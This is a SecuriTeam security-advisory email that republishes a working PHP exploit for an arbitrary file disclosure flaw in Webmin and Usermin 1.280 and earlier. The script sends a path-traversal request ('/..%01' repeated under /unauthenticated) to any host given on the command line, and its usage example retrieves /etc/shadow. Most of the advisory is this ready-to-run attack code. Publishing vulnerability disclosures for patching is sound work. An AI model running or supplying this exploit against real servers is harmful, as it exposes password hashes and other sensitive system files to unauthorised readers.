[EXPL] Webmin Usermin Arbitrary File Disclosure Vulnerability (Exploit)



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Webmin Usermin Arbitrary File Disclosure Vulnerability (Exploit)
------------------------------------------------------------------------


SUMMARY

" <http://www.webmin.com/> Webmin is a web-based interface for system
administration for Unix."

Improper design allows attackers to gain information about a system using
Webmin.

DETAILS

Vulnerable Systems:
* Webmin Webmin version 1.280 and prior

Immune Systems:
* Webmin Webmin version 1.290
* Webmin Webmin version 1.220

Exploit:
<?php
/*
Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability
Date : 2006-06-30
Patch : update to version 1.290
Advisory :
http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html
Coded by joffer , http://securitydot.net
*/

$host = $argv[1];
$port = $argv[2];
$http = $argv[3];
$file = $argv[4];
// CHECKING THE INPUT
if($host != "" && $port != "" && $http != "" && $file != "") {


$z = "/..%01";
for ($i=0;$i<60;$i++) {
$z.="/..%01";
}

$target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file."";

echo "Attacking ".$host."\n";
echo "---------------------------------\n";

// INITIALIZING CURL SESSION TO THE TARGET

$ch = curl_init();

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);

$content = curl_exec($ch);
curl_close ($ch);

// CLOSING CURL

// ECHOING THE CONTENT OF THE $FILE
echo $content;

echo "---------------------------------\n";
echo "Coded by joffer , http://securitydot.net\n";;

} else {
// IF INPUT IS NOT CORRECT DISPLAY THE README
echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILE\n";
echo "Example : php webmin.php localhost 10000 http /etc/shadow\n";
echo "Coded by joffer , http://securitydot.net\n";;
}

?>


ADDITIONAL INFORMATION

The information has been provided by <mailto:joffer@xxxxxxxxx> Alexander
Hristov.
The original article can be found at:
<http://securitydot.net/xpl/exploits/vulnerabilities/articles/1152/exploit.html> http://securitydot.net/xpl/exploits/vulnerabilities/articles/1152/exploit.html



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [UNIX] Webmin and Usermin PAM Authentication Bypass Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Lack of proper header validation allows attackers to bypass authentication ... and execute arbitrary code with root privileges in Webmin and Usermin. ...
    (Securiteam)
  • [NT] Microsoft Excel Length Parameter Parsing Buffer Overflow Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... * Microsoft Office XP Software (Excel 2002) ... * Microsoft Office v. X for Mac ...
    (Securiteam)
  • [UNIX] Rrdbrowse Arbitrary File Disclosure Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Rrdbrowse Arbitrary File Disclosure Vulnerability ... validation in rrdbrowser a remote attacker can cause the program to ...
    (Securiteam)
  • [EXPL] Ipswitch WhatsUp Gold Remote Buffer Overflow Exploit
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WhatsUp Gold Remote Buffer Overflow Vulnerability, ... print $socket "Referer: ...
    (Securiteam)
  • [NT] Microsoft Windows NTFS Improper Handler Closing
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... from a system shutdown, uninitialized data may be visible in files from ...
    (Securiteam)